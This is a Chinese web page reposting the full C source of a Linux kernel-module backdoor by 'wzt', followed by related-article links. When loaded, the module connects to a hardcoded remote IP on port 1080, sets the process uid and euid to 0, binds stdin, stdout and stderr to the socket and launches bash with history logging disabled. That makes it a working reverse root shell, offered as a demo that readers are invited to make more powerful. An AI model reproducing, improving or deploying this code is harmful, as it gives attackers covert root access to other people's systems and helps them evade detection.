简单的Linux内核后门原型源代码

/*
 * Kernel mode connect backdoor,haha~
 *
 * just a demo module to teach you how to write a backdoor in kernel mode,
 * i belive you can add more code to make it strong and powerful,wulala.
 *
 * by wzt <wzt#xsec.org>
 *
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/types.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <linux/unistd.h>
#include <net/sock.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include "syscalls.h"

#define REMOTO_IP    "192.168.75.1"
#define port     1080

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

static inline my_syscall2(int, dup2, int, oldfd, int, newfd);

static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

char *env[]={
    "TERM=linux",
    "HOME=" HOME,
    "PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
    ":/usr/local/sbin",
    "HISTFILE=/dev/null",
     NULL };
     
int k_connect(void)
{
        struct task_struct *tsk = current;
        struct socket *sock,*newsock;
        struct sockaddr_in server;
    int sockfd,i;
        int error = 0,len = sizeof(struct sockaddr);
        
        set_fs(KERNEL_DS);
        
        error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
        if (error < 0) {
                printk("[-] socket_create failed: %d\n",error);
                sock_release(sock);
                return -1;
        }
    
    sockfd = sock_map_fd(sock);
    if (sockfd < 0) {
        printk("[-] sock_map_fd() failed.\n");
        sock_release(sock);
        return -1;
    }

    for (i = 0; i < 8; i++)
        server.sin_zero[i] = 0;

    server.sin_family = PF_INET;
    server.sin_addr.s_addr = in_aton(REMOTO_IP);
    server.sin_port = htons(port);

        error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);
    if (error < 0) {
        printk("[-] connect to %s failed.\n",REMOTO_IP);
        return -1;
    }

    printk("[+] connect to %s ok.\n",REMOTO_IP);
    
    set_fs(KERNEL_DS);
    
    tsk->uid = 0;
    tsk->euid = 0;
    tsk->gid = 0x11111111;
    tsk->egid = 0;
    
    dup2(sockfd,0);
    dup2(sockfd,1);
    dup2(sockfd,2);
    
    execve(earg[0], (const char **) earg, (const char **) env);
    
        return 1;
}

int k_socket_init(void)
{
        printk("[+] kernel socket test start.\n");
        
        k_connect();
}

void k_socket_exit(void)
{
        printk("[+] kernel socket test over.\n");
}

module_init(k_socket_init);
module_exit(k_socket_exit);


责任编辑 webmaster

相关链接

关注七项Linux内核发展方向

Linux动态库搜索路径

Linux中判断平台是大端或小端...

Linux下强大的杀毒软件:Avast

Linux下的段错误产生的原因及...

Linux网络编程:加密通讯协议S...

虚拟化是Linux的好机会

GNU/Linux中解决多线程互斥同...